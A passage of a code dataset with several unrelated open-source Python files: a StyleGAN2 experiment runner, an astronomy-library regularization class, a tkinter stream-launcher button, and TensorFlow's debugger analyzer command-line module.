list(self.point_at_distance(d).coords)\r\n end_point = list(self.point_at_distance(d + delta).coords)\r\n\r\n if left:\r\n clockwise = self.left_clockwise\r\n else:\r\n clockwise = not self.left_clockwise\r\n\r\n # find a point in this direction\r\n new_end_point = rotate_90_deg(np.array(point), np.array(end_point), clockwise)\r\n return get_unit_vector(point, new_end_point)\r\n","repo_name":"puijterwaal/shaplien","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3522348224","text":"### this will be copied to colab\n### everything else imported\nfrom StyleGAN2TTTExperiment import StyleGAN2TTTExperiment\nimport sys\nimport os\n\nimport torch\nimport numpy as np\nimport random\n\ndef run(args):\n e = StyleGAN2TTTExperiment() \n #print(args)\n e.set_args(args)\n e.setup()\n ## SETUP\n #if args.TTT:\n if args.method == 'TNet+TTT' or args.method == 'TTTz':\n e.setup_prenetwork_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TTTw':\n e.setup_prenetwork_w_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TNet':\n e.setup_intranetwork_ttt()\n print('finished setup')\n\n ## TRAIN\n # may need to set train_sample_size\n if args.method == 'TNet+TTT':\n e.train_prenetwork_and_intranetwork_ttt()\n elif args.method == 'TNet':\n e.train_intranetwork_ttt()\n elif args.method == 'TTTz':\n e.train_prenetwork_ttt()\n elif args.method == 'TTTw':\n e.train_prenetwork_w_ttt()\n print('finished train')\n \n for i in range(args.n_eval_samples):\n ##comparison methods\n #if args.method in comparison_methods: #= ['normal','coachz','coachw','ttz','ttw']\n if args.method == 'normal':\n e.sample_n_stylegan_images_without_tt()\n if args.method == 'coachz':\n e.sample_n_stylegan_images_with_coachgan()\n if args.method == 'coachw':\n e.sample_n_stylegan_images_with_w_coachgan()\n if args.method == 'ttz':\n e.sample_n_stylegan_images_with_z_tt()\n if args.method == 'ttw':\n e.sample_n_stylegan_images_with_w_ttl()\n\n ## TTT and TNET \n if args.method == 'TTTz':\n e.sample_n_stylegan_images_with_prenetwork_ttt()\n if 
args.method == 'TTTw':\n e.sample_n_stylegan_images_with_post_w_prenetwork_ttt()\n if args.method == 'TNet':\n e.sample_n_stylegan_images_with_intranetwork_ttt()\n if args.method == 'TNet+TTT':\n e.sample_n_stylegan_images_with_pre_and_intranetwork_ttt()\n\n e.save_results(num=i*args.batch_size)\n #e.calc_metrics()\n\n#parser = argparse.ArgumentParser()\n#parser.add_argument('--TT', action='store_true', help='use TT for z')\n#parser.add_argument('--TTl', action='store_true', help='use TT-lerp for w')\n#parser.add_argument('--TTT', action='store_true', help='use TTT for z')\n#parser.add_argument('--w_TTT', action='store_true', help='use TTT for w')\n#parser.add_argument('--coach_z', action='store_true', help='use CoachGAN for z')\n#parser.add_argument('--coach_w', action='store_true', help='use CoachGAN for w')\nfrom os.path import join\nimport easydict\nargs = easydict.EasyDict()\n\nargs.repo = './stylegan2'\nsys.path.append(args.repo)\n\nimport dnnlib\nfrom dnnlib import tflib\n\ntflib.init_tf()\n\nimport metrics\n\n#comparison methods\nargs.truncation = 0.7\nargs.lr =0.00001\nargs.niter = 1000\nargs.batch_size = 2\nargs.n_eval_samples = 5000\ndatasets = ['ffhq','cat','horse','church','car']\nargs.dataset = 'church'\nargs.path ='/content/results'\n\nargs.base_exp_name='testing1000_iter_lr_00001'\nargs.size = 1024 if args.dataset == 'ffhq' else 256\nargs.checkpoint = 'stylegan2-%s-config-f.pt' % args.dataset\nargs.channel_multiplier = 2\nargs.latent = 512\nargs.n_mlp = 8\nargs.device = 'cuda'\n\n## TESTING\nmethods = ['TTTz','TTTw','TNet','TNet+TTT']\n#TTTw isn't working right now\n#methods = ['TTTw','TNet','TNet+TTT']\n#methods = ['TNet','TNet+TTT']\n#methods = ['TNet+TTT']\narchitectures = ['prelu','a','b','c','d','e','f']\n#architectures = ['c','d','e','f']\n#architectures = ['d','e','f']\nlayers = [2,4]#,8]#,16]#,32,64,128,256]\nfor m in methods:\n if m in ['TTTz','TTTw']:\n layers = [2,4,8,16,32]\n else:\n layers = [2,4]\n for arch in architectures:\n for nl in layers:\n args.nlayer = nl\n args.arch = arch\n args.method = m\n\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n np.random.seed(seed) # Numpy module.\n random.seed(seed) # Python random module.\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n ##\n args.arch = arch\n if args.method in ['TTTz','TTTw','TNet','TNet+TTT']:\n args.savedir = join( args.path, args.base_exp_name, args.method+args.arch+str(args.nlayer))\n else:\n args.savedir = join( args.path, args.base_exp_name, args.method)\n print(args.savedir)\n if not os.path.exists(args.savedir):\n os.makedirs(args.savedir)\n run(args)\n\n#NOTE: All comparison methods work\n# coachz and ttz give different lookin images (as expected)\ncomparison_methods = ['normal','coachz','coachw','ttz','ttw']\nfor method in comparison_methods:\n print('method:',method)\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n np.random.seed(seed) # Numpy module.\n random.seed(seed) # Python random module.\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n args.method = method\n args.savedir = join( args.path, args.base_exp_name, args.method)\n if not os.path.exists(args.savedir):\n os.makedirs(args.savedir)\n run(args)\n\n\nexit()\n\n## SAMPLE\n#a\\item BPF + x\n#b\\item BPF-BF + x\n#c\\item 
BPF-BPF$_{bottleneck}$-BF + \n#d\\item FBP + x\n#e\\item FBP-FB + x\n#f\\item FBP-F$_{bottleneck}$BP-FB + \n#our methods\n#if args.train ==> train then sample\n","repo_name":"mbbrodie/stylegan2","sub_path":"run_stylegan_ttt_experiments.py","file_name":"run_stylegan_ttt_experiments.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11703719704","text":"from __future__ import annotations\r\nimport numpy as np\r\nfrom typing import TYPE_CHECKING\r\n\r\nif TYPE_CHECKING:\r\n from autoarray.inversion.linear_obj.linear_obj import LinearObj\r\n\r\nfrom autoarray.inversion.regularization.abstract import AbstractRegularization\r\n\r\nfrom autoarray.inversion.regularization import regularization_util\r\n\r\n\r\nclass BrightnessZeroth(AbstractRegularization):\r\n def __init__(\r\n self,\r\n coefficient: float = 1.0,\r\n signal_scale: float = 1.0,\r\n ):\r\n \"\"\"\r\n An adaptive regularization scheme which applies zeroth order regularization to pixels with low expected\r\n signal values.\r\n\r\n For the weighted regularization scheme, each pixel is given an 'effective regularization weight', which\r\n controls the degree of zeroth order regularization applied to each pixel. The motivation for this is that\r\n the exterior regions of a pixelization's mesh ought to have a signal consistent with zero,\r\n but may have a low level of non-zero signal when fitting the data.\r\n\r\n To implement this regularization, values on the diagonal of the regularization matrix are increased\r\n according to the regularization weights of each pixel.\r\n\r\n Parameters\r\n ----------\r\n coefficient\r\n The regularization coefficient which controls the degree of zeroth order regularization applied to\r\n the inversion reconstruction, in regions of low signal.\r\n signal_scale\r\n A factor which controls how rapidly the smoothness of regularization varies from high signal regions to\r\n low signal regions.\r\n \"\"\"\r\n\r\n super().__init__()\r\n\r\n self.coefficient = coefficient\r\n self.signal_scale = signal_scale\r\n\r\n def regularization_weights_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization weights of the ``BrightnessZeroth`` regularization scheme.\r\n\r\n The weights define the level of zeroth order regularization applied to every mesh parameter (typically pixels\r\n of a ``Mapper``).\r\n\r\n They are computed using an estimate of the expected signal in each pixel.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses these weights when performing regularization.\r\n\r\n Returns\r\n -------\r\n The regularization weights.\r\n \"\"\"\r\n pixel_signals = linear_obj.pixel_signals_from(signal_scale=self.signal_scale)\r\n\r\n return regularization_util.brightness_zeroth_regularization_weights_from(\r\n coefficient=self.coefficient, pixel_signals=pixel_signals\r\n )\r\n\r\n def regularization_matrix_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization matrix of this regularization scheme.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. 
a ``Mapper``) which uses this matrix to perform regularization.\r\n\r\n Returns\r\n -------\r\n The regularization matrix.\r\n \"\"\"\r\n regularization_weights = self.regularization_weights_from(linear_obj=linear_obj)\r\n\r\n return regularization_util.brightness_zeroth_regularization_matrix_from(\r\n regularization_weights=regularization_weights\r\n )\r\n","repo_name":"Jammy2211/PyAutoArray","sub_path":"autoarray/inversion/regularization/brightness_zeroth.py","file_name":"brightness_zeroth.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"42212628905","text":"from tkinter import *\nimport webbrowser\n\nroot = Tk()\n\nnew = 1\nurl = \"http://192.168.156.87:8080/\" #Replace with the ip of stream\n\ndef openweb():\n webbrowser.open(url,new=new)\n\nBtn = Button(root, text = \"Stream Cam\",command=openweb)\nBtn.pack()\n\nroot.mainloop()\n","repo_name":"Pritesh-0/rudra_training","sub_path":"guistream.py","file_name":"guistream.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4001291954","text":"import argparse\nimport copy\nimport re\n\n\nfrom tensorflow.python.debug.cli import cli_config\nfrom tensorflow.python.debug.cli import cli_shared\nfrom tensorflow.python.debug.cli import command_parser\nfrom tensorflow.python.debug.cli import debugger_cli_common\nfrom tensorflow.python.debug.cli import evaluator\nfrom tensorflow.python.debug.cli import ui_factory\nfrom tensorflow.python.debug.lib import debug_graphs\nfrom tensorflow.python.debug.lib import source_utils\n\nRL = debugger_cli_common.RichLine\n\n# String constants for the depth-dependent hanging indent at the beginning\n# of each line.\nHANG_UNFINISHED = \"| \" # Used for unfinished recursion depths.\nHANG_FINISHED = \" \"\nHANG_SUFFIX = \"|- \"\n\n# String constant for displaying depth and op type.\nDEPTH_TEMPLATE = \"(%d) \"\nOP_TYPE_TEMPLATE = \"[%s] \"\n\n# String constants for control inputs/outputs, etc.\nCTRL_LABEL = \"(Ctrl) \"\nELLIPSIS = \"...\"\n\nSORT_TENSORS_BY_TIMESTAMP = \"timestamp\"\nSORT_TENSORS_BY_DUMP_SIZE = \"dump_size\"\nSORT_TENSORS_BY_OP_TYPE = \"op_type\"\nSORT_TENSORS_BY_TENSOR_NAME = \"tensor_name\"\n\n\ndef _add_main_menu(output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=True,\n enable_print_tensor=True,\n enable_list_inputs=True,\n enable_list_outputs=True):\n \"\"\"Generate main menu for the screen output from a command.\n\n Args:\n output: (debugger_cli_common.RichTextLines) the output object to modify.\n node_name: (str or None) name of the node involved (if any). 
If None,\n the menu items node_info, list_inputs and list_outputs will be\n automatically disabled, overriding the values of arguments\n enable_node_info, enable_list_inputs and enable_list_outputs.\n enable_list_tensors: (bool) whether the list_tensor menu item will be\n enabled.\n enable_node_info: (bool) whether the node_info item will be enabled.\n enable_print_tensor: (bool) whether the print_tensor item will be enabled.\n enable_list_inputs: (bool) whether the item list_inputs will be enabled.\n enable_list_outputs: (bool) whether the item list_outputs will be enabled.\n \"\"\"\n\n menu = debugger_cli_common.Menu()\n\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_tensors\", \"list_tensors\", enabled=enable_list_tensors))\n\n if node_name:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\",\n \"node_info -a -d -t %s\" % node_name,\n enabled=enable_node_info))\n menu.append(\n debugger_cli_common.MenuItem(\n \"print_tensor\",\n \"print_tensor %s\" % node_name,\n enabled=enable_print_tensor))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_inputs\",\n \"list_inputs -c -r %s\" % node_name,\n enabled=enable_list_inputs))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_outputs\",\n \"list_outputs -c -r %s\" % node_name,\n enabled=enable_list_outputs))\n else:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"print_tensor\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_inputs\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_outputs\", None, enabled=False))\n\n menu.append(\n debugger_cli_common.MenuItem(\"run_info\", \"run_info\"))\n menu.append(\n debugger_cli_common.MenuItem(\"help\", \"help\"))\n\n output.annotations[debugger_cli_common.MAIN_MENU_KEY] = menu\n\n\nclass DebugAnalyzer(object):\n \"\"\"Analyzer for debug data from dump directories.\"\"\"\n\n _TIMESTAMP_COLUMN_HEAD = \"t (ms)\"\n _DUMP_SIZE_COLUMN_HEAD = \"Size (B)\"\n _OP_TYPE_COLUMN_HEAD = \"Op type\"\n _TENSOR_NAME_COLUMN_HEAD = \"Tensor name\"\n\n # Op types to be omitted when generating descriptions of graph structure.\n _GRAPH_STRUCT_OP_TYPE_DENYLIST = (\"_Send\", \"_Recv\", \"_HostSend\", \"_HostRecv\",\n \"_Retval\")\n\n def __init__(self, debug_dump, config):\n \"\"\"DebugAnalyzer constructor.\n\n Args:\n debug_dump: A DebugDumpDir object.\n config: A `cli_config.CLIConfig` object that carries user-facing\n configurations.\n \"\"\"\n\n self._debug_dump = debug_dump\n self._evaluator = evaluator.ExpressionEvaluator(self._debug_dump)\n\n # Initialize tensor filters state.\n self._tensor_filters = {}\n\n self._build_argument_parsers(config)\n config.set_callback(\"graph_recursion_depth\",\n self._build_argument_parsers)\n\n # TODO(cais): Implement list_nodes.\n\n def _build_argument_parsers(self, config):\n \"\"\"Build argument parsers for DebugAnalayzer.\n\n Args:\n config: A `cli_config.CLIConfig` object.\n\n Returns:\n A dict mapping command handler name to `ArgumentParser` instance.\n \"\"\"\n # Argument parsers for command handlers.\n self._arg_parsers = {}\n\n # Parser for list_tensors.\n ap = argparse.ArgumentParser(\n description=\"List dumped intermediate tensors.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-f\",\n \"--tensor_filter\",\n dest=\"tensor_filter\",\n type=str,\n default=\"\",\n help=\"List only Tensors passing the filter of the specified name\")\n ap.add_argument(\n \"-fenn\",\n 
\"--filter_exclude_node_names\",\n dest=\"filter_exclude_node_names\",\n type=str,\n default=\"\",\n help=\"When applying the tensor filter, exclude node with names \"\n \"matching the regular expression. Applicable only if --tensor_filter \"\n \"or -f is used.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n dest=\"node_name_filter\",\n type=str,\n default=\"\",\n help=\"filter node name by regex.\")\n ap.add_argument(\n \"-t\",\n \"--op_type_filter\",\n dest=\"op_type_filter\",\n type=str,\n default=\"\",\n help=\"filter op type by regex.\")\n ap.add_argument(\n \"-s\",\n \"--sort_by\",\n dest=\"sort_by\",\n type=str,\n default=SORT_TENSORS_BY_TIMESTAMP,\n help=(\"the field to sort the data by: (%s | %s | %s | %s)\" %\n (SORT_TENSORS_BY_TIMESTAMP, SORT_TENSORS_BY_DUMP_SIZE,\n SORT_TENSORS_BY_OP_TYPE, SORT_TENSORS_BY_TENSOR_NAME)))\n ap.add_argument(\n \"-r\",\n \"--reverse\",\n dest=\"reverse\",\n action=\"store_true\",\n help=\"sort the data in reverse (descending) order\")\n self._arg_parsers[\"list_tensors\"] = ap\n\n # Parser for node_info.\n ap = argparse.ArgumentParser(\n description=\"Show information about a node.\", usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an associated tensor, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-a\",\n \"--attributes\",\n dest=\"attributes\",\n action=\"store_true\",\n help=\"Also list attributes of the node.\")\n ap.add_argument(\n \"-d\",\n \"--dumps\",\n dest=\"dumps\",\n action=\"store_true\",\n help=\"Also list dumps available from the node.\")\n ap.add_argument(\n \"-t\",\n \"--traceback\",\n dest=\"traceback\",\n action=\"store_true\",\n help=\"Also include the traceback of the node's creation \"\n \"(if available in Python).\")\n self._arg_parsers[\"node_info\"] = ap\n\n # Parser for list_inputs.\n ap = argparse.ArgumentParser(\n description=\"Show inputs to a node.\", usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the input tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show inputs to the node recursively, i.e., the input tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of input nodes.\")\n self._arg_parsers[\"list_inputs\"] = ap\n\n # Parser for list_outputs.\n ap = argparse.ArgumentParser(\n description=\"Show the nodes that receive the outputs of given node.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the output tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show recipients of the 
node recursively, i.e., the output \"\n \"tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of recipient nodes.\")\n self._arg_parsers[\"list_outputs\"] = ap\n\n # Parser for print_tensor.\n self._arg_parsers[\"print_tensor\"] = (\n command_parser.get_print_tensor_argparser(\n \"Print the value of a dumped tensor.\"))\n\n # Parser for print_source.\n ap = argparse.ArgumentParser(\n description=\"Print a Python source file with overlaid debug \"\n \"information, including the nodes (ops) or Tensors created at the \"\n \"source lines.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"source_file_path\",\n type=str,\n help=\"Path to the source file.\")\n ap.add_argument(\n \"-t\",\n \"--tensors\",\n dest=\"tensors\",\n action=\"store_true\",\n help=\"Label lines with dumped Tensors, instead of ops.\")\n ap.add_argument(\n \"-m\",\n \"--max_elements_per_line\",\n type=int,\n default=10,\n help=\"Maximum number of elements (ops or Tensors) to show per source \"\n \"line.\")\n ap.add_argument(\n \"-b\",\n \"--line_begin\",\n type=int,\n default=1,\n help=\"Print source beginning at line number (1-based.)\")\n self._arg_parsers[\"print_source\"] = ap\n\n # Parser for list_source.\n ap = argparse.ArgumentParser(\n description=\"List source files responsible for constructing nodes and \"\n \"tensors present in the run().\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-p\",\n \"--path_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for file path.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for node name.\")\n self._arg_parsers[\"list_source\"] = ap\n\n # Parser for eval.\n ap = argparse.ArgumentParser(\n description=\"\"\"Evaluate an arbitrary expression. Can use tensor values\n from the current debug dump. The debug tensor names should be enclosed\n in pairs of backticks. Expressions with spaces should be enclosed in\n a pair of double quotes or a pair of single quotes. By default, numpy\n is imported as np and can be used in the expressions. 
E.g.,\n 1) eval np.argmax(`Softmax:0`),\n 2) eval 'np.sum(`Softmax:0`, axis=1)',\n 3) eval \"np.matmul((`output/Identity:0`/`Softmax:0`).T, `Softmax:0`)\".\n \"\"\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"expression\",\n type=str,\n help=\"\"\"Expression to be evaluated.\n 1) in the simplest case, use :, e.g.,\n hidden_0/MatMul:0.\n\n 2) if the default debug op \"DebugIdentity\" is to be overridden, use\n ::, e.g.,\n hidden_0/MatMul:0:DebugNumericSummary.\n\n 3) if the tensor of the same name exists on more than one device, use\n ::[:], e.g.,\n /job:worker/replica:0/task:0/gpu:0:hidden_0/MatMul:0\n /job:worker/replica:0/task:2/cpu:0:hidden_0/MatMul:0:DebugNanCount.\n\n 4) if the tensor is executed multiple times in a given `Session.run`\n call, specify the execution index with a 0-based integer enclose in a\n pair of brackets at the end, e.g.,\n RNN/tanh:0[0]\n /job:worker/replica:0/task:0/gpu:0:RNN/tanh:0[0].\"\"\")\n ap.add_argument(\n \"-a\",\n \"--all\",\n dest=\"print_all\",\n action=\"store_true\",\n help=\"Print the tensor in its entirety, i.e., do not use ellipses \"\n \"(may be slow for large results).\")\n ap.add_argument(\n \"-w\",\n \"--write_path\",\n default=\"\",\n help=\"Path of the numpy file to write the evaluation result to, \"\n \"using numpy.save()\")\n self._arg_parsers[\"eval\"] = ap\n\n def add_tensor_filter(self, filter_name, filter_callable):\n \"\"\"Add a tensor filter.\n\n A tensor filter is a named callable of the signature:\n filter_callable(dump_datum, tensor),\n\n wherein dump_datum is an instance of debug_data.DebugTensorDatum carrying\n metadata about the dumped tensor, including tensor name, timestamps, etc.\n tensor is the value of the dumped tensor as an numpy.ndarray object.\n The return value of the function is a bool.\n This is the same signature as the input argument to\n debug_data.DebugDumpDir.find().\n\n Args:\n filter_name: (str) name of the filter. 
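For illustration, a filter of the shape described here might look like the following sketch (a hypothetical example, not part of this module; only the (dump_datum, tensor) -> bool contract is taken from the surrounding docstring):

import numpy as np

def has_negative_values(dump_datum, tensor):
  # dump_datum carries metadata about the dump (node name, timestamp, etc.);
  # this simple filter only inspects the tensor value itself.
  del dump_datum  # Unused by this filter.
  if tensor is None or not isinstance(tensor, np.ndarray):
    return False  # Uninitialized or unconvertible tensors are skipped.
  return bool(np.issubdtype(tensor.dtype, np.number) and (tensor < 0).any())

# Registered via: analyzer.add_tensor_filter('has_negative_values', has_negative_values)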
Cannot be empty.\n filter_callable: (callable) a filter function of the signature described\n as above.\n\n Raises:\n ValueError: If filter_name is an empty str.\n TypeError: If filter_name is not a str.\n Or if filter_callable is not callable.\n \"\"\"\n\n if not isinstance(filter_name, str):\n raise TypeError(\"Input argument filter_name is expected to be str, \"\n \"but is not.\")\n\n # Check that filter_name is not an empty str.\n if not filter_name:\n raise ValueError(\"Input argument filter_name cannot be empty.\")\n\n # Check that filter_callable is callable.\n if not callable(filter_callable):\n raise TypeError(\n \"Input argument filter_callable is expected to be callable, \"\n \"but is not.\")\n\n self._tensor_filters[filter_name] = filter_callable\n\n def get_tensor_filter(self, filter_name):\n \"\"\"Retrieve filter function by name.\n\n Args:\n filter_name: Name of the filter set during add_tensor_filter() call.\n\n Returns:\n The callable associated with the filter name.\n\n Raises:\n ValueError: If there is no tensor filter of the specified filter name.\n \"\"\"\n\n if filter_name not in self._tensor_filters:\n raise ValueError(\"There is no tensor filter named \\\"%s\\\"\" % filter_name)\n\n return self._tensor_filters[filter_name]\n\n def get_help(self, handler_name):\n return self._arg_parsers[handler_name].format_help()\n\n def list_tensors(self, args, screen_info=None):\n \"\"\"Command handler for list_tensors.\n\n List tensors dumped during debugged Session.run() call.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n\n Raises:\n ValueError: If `--filter_exclude_node_names` is used without `-f` or\n `--tensor_filter` being used.\n \"\"\"\n\n # TODO(cais): Add annotations of substrings for dumped tensor names, to\n # facilitate on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"list_tensors\"].parse_args(args)\n\n output = []\n\n filter_strs = []\n if parsed.op_type_filter:\n op_type_regex = re.compile(parsed.op_type_filter)\n filter_strs.append(\"Op type regex filter: \\\"%s\\\"\" % parsed.op_type_filter)\n else:\n op_type_regex = None\n\n if parsed.node_name_filter:\n node_name_regex = re.compile(parsed.node_name_filter)\n filter_strs.append(\"Node name regex filter: \\\"%s\\\"\" %\n parsed.node_name_filter)\n else:\n node_name_regex = None\n\n output = debugger_cli_common.RichTextLines(filter_strs)\n output.append(\"\")\n\n if parsed.tensor_filter:\n try:\n filter_callable = self.get_tensor_filter(parsed.tensor_filter)\n except ValueError:\n output = cli_shared.error(\"There is no tensor filter named \\\"%s\\\".\" %\n parsed.tensor_filter)\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n data_to_show = self._debug_dump.find(\n filter_callable,\n exclude_node_names=parsed.filter_exclude_node_names)\n else:\n if parsed.filter_exclude_node_names:\n raise ValueError(\n \"The flag --filter_exclude_node_names is valid only when \"\n \"the flag -f or --tensor_filter is used.\")\n\n data_to_show = self._debug_dump.dumped_tensor_data\n\n # TODO(cais): Implement filter by lambda on tensor value.\n\n max_timestamp_width, max_dump_size_width, max_op_type_width = (\n self._measure_tensor_list_column_widths(data_to_show))\n\n # Sort the data.\n data_to_show = self._sort_dump_data_by(\n data_to_show, parsed.sort_by, 
parsed.reverse)\n\n output.extend(\n self._tensor_list_column_heads(parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width))\n\n dump_count = 0\n for dump in data_to_show:\n if node_name_regex and not node_name_regex.match(dump.node_name):\n continue\n\n if op_type_regex:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if not op_type_regex.match(op_type):\n continue\n\n rel_time = (dump.timestamp - self._debug_dump.t0) / 1000.0\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n dumped_tensor_name = \"%s:%d\" % (dump.node_name, dump.output_slot)\n op_type = self._debug_dump.node_op_type(dump.node_name)\n\n line = \"[%.3f]\" % rel_time\n line += \" \" * (max_timestamp_width - len(line))\n line += dump_size_str\n line += \" \" * (max_timestamp_width + max_dump_size_width - len(line))\n line += op_type\n line += \" \" * (max_timestamp_width + max_dump_size_width +\n max_op_type_width - len(line))\n line += dumped_tensor_name\n\n output.append(\n line,\n font_attr_segs=[(\n len(line) - len(dumped_tensor_name), len(line),\n debugger_cli_common.MenuItem(\"\", \"pt %s\" % dumped_tensor_name))])\n dump_count += 1\n\n if parsed.tensor_filter:\n output.prepend([\n \"%d dumped tensor(s) passing filter \\\"%s\\\":\" %\n (dump_count, parsed.tensor_filter)\n ])\n else:\n output.prepend([\"%d dumped tensor(s):\" % dump_count])\n\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n def _measure_tensor_list_column_widths(self, data):\n \"\"\"Determine the maximum widths of the timestamp and op-type column.\n\n This method assumes that data is sorted in the default order, i.e.,\n by ascending timestamps.\n\n Args:\n data: (list of DebugTensorDaum) the data based on which the maximum\n column widths will be determined.\n\n Returns:\n (int) maximum width of the timestamp column. 0 if data is empty.\n (int) maximum width of the dump size column. 0 if data is empty.\n (int) maximum width of the op type column. 
0 if data is empty.\n \"\"\"\n\n max_timestamp_width = 0\n if data:\n max_rel_time_ms = (data[-1].timestamp - self._debug_dump.t0) / 1000.0\n max_timestamp_width = len(\"[%.3f] \" % max_rel_time_ms) + 1\n max_timestamp_width = max(max_timestamp_width,\n len(self._TIMESTAMP_COLUMN_HEAD) + 1)\n\n max_dump_size_width = 0\n for dump in data:\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n if len(dump_size_str) + 1 > max_dump_size_width:\n max_dump_size_width = len(dump_size_str) + 1\n max_dump_size_width = max(max_dump_size_width,\n len(self._DUMP_SIZE_COLUMN_HEAD) + 1)\n\n max_op_type_width = 0\n for dump in data:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if len(op_type) + 1 > max_op_type_width:\n max_op_type_width = len(op_type) + 1\n max_op_type_width = max(max_op_type_width,\n len(self._OP_TYPE_COLUMN_HEAD) + 1)\n\n return max_timestamp_width, max_dump_size_width, max_op_type_width\n\n def _sort_dump_data_by(self, data, sort_by, reverse):\n \"\"\"Sort a list of DebugTensorDatum in specified order.\n\n Args:\n data: (list of DebugTensorDatum) the data to be sorted.\n sort_by: The field to sort data by.\n reverse: (bool) Whether to use reversed (descending) order.\n\n Returns:\n (list of DebugTensorDatum) in sorted order.\n\n Raises:\n ValueError: given an invalid value of sort_by.\n \"\"\"\n\n if sort_by == SORT_TENSORS_BY_TIMESTAMP:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: x.timestamp)\n elif sort_by == SORT_TENSORS_BY_DUMP_SIZE:\n return sorted(data, reverse=reverse, key=lambda x: x.dump_size_bytes)\n elif sort_by == SORT_TENSORS_BY_OP_TYPE:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: self._debug_dump.node_op_type(x.node_name))\n elif sort_by == SORT_TENSORS_BY_TENSOR_NAME:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: \"%s:%d\" % (x.node_name, x.output_slot))\n else:\n raise ValueError(\"Unsupported key to sort tensors by: %s\" % sort_by)\n\n def _tensor_list_column_heads(self, parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width):\n \"\"\"Generate a line containing the column heads of the tensor list.\n\n Args:\n parsed: Parsed arguments (by argparse) of the list_tensors command.\n max_timestamp_width: (int) maximum width of the timestamp column.\n max_dump_size_width: (int) maximum width of the dump size column.\n max_op_type_width: (int) maximum width of the op type column.\n\n Returns:\n A RichTextLines 